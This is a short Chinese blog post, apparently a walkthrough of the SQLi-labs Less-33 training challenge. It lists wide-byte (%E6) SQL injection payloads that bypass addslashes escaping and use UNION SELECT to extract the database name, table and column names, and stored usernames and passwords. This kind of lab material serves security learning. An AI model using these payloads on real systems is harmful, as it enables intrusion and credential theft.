码迷,mamicode.com
首页 > 其他好文 > 详细

Less(33)GET-Bypass AddSlasher()

时间:2020-03-03 19:07:06      阅读:76      评论:0      收藏:0      [点我收藏+]

标签:user   form   不用   cat   data   from   add   less   ESS   

1.和上一题一样的,payload都不用改

 

2.爆破

  (1)爆库:?id=-1%E6‘ union select 1,2,database() --+

    技术图片

  (2)爆表:?id=-1%E6‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

    技术图片

 

 

  (3)爆列名:?id=-1%E6‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

    技术图片

 

 

  (4)爆值:?id=-1%E6‘ union select 1,group_concat(username,0x7e,password),3 from security.users --+

    技术图片

 

Less(33)GET-Bypass AddSlasher()

标签:user   form   不用   cat   data   from   add   less   ESS   

原文地址:https://www.cnblogs.com/meng-yu37/p/12403938.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!